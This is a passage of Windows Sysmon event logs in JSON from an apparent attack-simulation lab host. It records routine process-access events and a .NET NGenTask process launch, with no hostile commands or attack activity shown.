C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.804","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6146,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.804\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.804","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6147,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.804\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.804","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6148,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.815\r\nProcessGuid: {A837DB8D-040E-5F25-0000-0010CD2D0B00}\r\nProcessId: 4688\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngentask.exe\r\nFileVersion: 4.7.2053.0 built by: NET47REL1\r\nDescription: Microsoft .NET Framework optimization service\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: NGenTask.exe\r\nCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe\" /RuntimeWide /StopEvent:868\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=310EC059A68DEB69CFC32CFA946FEFE0,SHA256=7BC95DCD791A505FDD9FD0E117EB0BD5AC4F28176E8127FFB39521DAEF670970,IMPHASH=00000000000000000000000000000000\r\nParentProcessGuid: {A837DB8D-040E-5F25-0000-0010DF220B00}\r\nParentProcessId: 2360\r\nParentImage: C:\\Windows\\System32\\taskhostw.exe\r\nParentCommandLine: taskhostw.exe /RuntimeWide","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.815","ProcessGuid":"{A837DB8D-040E-5F25-0000-0010CD2D0B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngentask.exe","FileVersion":"4.7.2053.0 built by: NET47REL1","Description":"Microsoft .NET Framework optimization service","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"NGenTask.exe","CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe\" /RuntimeWide /StopEvent:868","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=310EC059A68DEB69CFC32CFA946FEFE0,SHA256=7BC95DCD791A505FDD9FD0E117EB0BD5AC4F28176E8127FFB39521DAEF670970,IMPHASH=00000000000000000000000000000000","ParentProcessGuid":"{A837DB8D-040E-5F25-0000-0010DF220B00}","ParentProcessId":"2360","ParentImage":"C:\\Windows\\System32\\taskhostw.exe","ParentCommandLine":"taskhostw.exe /RuntimeWide","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6149,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.804\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010DF220B00}\r\nSourceProcessId: 2360\r\nSourceThreadId: 3708\r\nSourceImage: C:\\Windows\\system32\\taskhostw.exe\r\nTargetProcessGUID: {A837DB8D-040E-5F25-0000-0010CD2D0B00}\r\nTargetProcessId: 4688\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b56bc|UNKNOWN(00007FFF445411E2)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.804","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010DF220B00}","SourceProcessId":"2360","SourceThreadId":"3708","SourceImage":"C:\\Windows\\system32\\taskhostw.exe","TargetProcessGUID":"{A837DB8D-040E-5F25-0000-0010CD2D0B00}","TargetProcessId":"4688","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b56bc|UNKNOWN(00007FFF445411E2)","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6150,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.804\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-040E-5F25-0000-0010CD2D0B00}\r\nTargetProcessId: 4688\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.804","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-040E-5F25-0000-0010CD2D0B00}","TargetProcessId":"4688","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6151,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.804\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.804","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6152,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.804\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.804","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6153,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.804\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.804","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
